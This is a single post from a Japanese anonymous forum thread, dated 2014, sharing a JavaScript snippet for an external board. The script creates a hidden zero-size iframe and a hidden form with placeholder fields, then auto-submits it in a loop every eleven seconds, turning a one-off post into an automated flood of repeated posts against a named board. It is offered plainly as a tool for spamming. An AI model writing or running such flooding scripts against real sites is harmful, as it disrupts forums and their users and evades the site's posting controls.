【妖怪兎】KINDworld Part8【人気急上昇】 (1000)

←← 掲示板一覧に戻る ← スレッド一覧に戻る

477 名無しさん@UVERworld BBS 2014/08/20(水) 05:47:01 ID:wnazUdic

http://jbbs.shitaraba.net/anime/10468/
のソース68-78行をこれに書き換えたら単発postが連投postになりますぜよ。●は書き換えてね
<script language="javascript">//68~78
document.write("<iframe name=\"FrameName\" width=\"0\" height=\"0\"></iframe>");
document.write("<form name=\"FormName\" action=\"●●●\" method=\"post\" target=\"FrameName\">");
document.write("<input type=\"hidden\" name=\"MESSAGE\" value=\"●●●");
document.write("<input type=\"hidden\" name=\"DIR\" value=\"movie\">");
document.write("<input type=\"hidden\" name=\"BBS\" value=\"10404\">");
document.write("<input type=\"hidden\" name=\"SUBJECT\" value=\"●●●\">");
document.write("</form>");
function post()
{
document.FormName.submit();
setTimeout("post()",11000);//これで11秒間隔
}
post();
</script>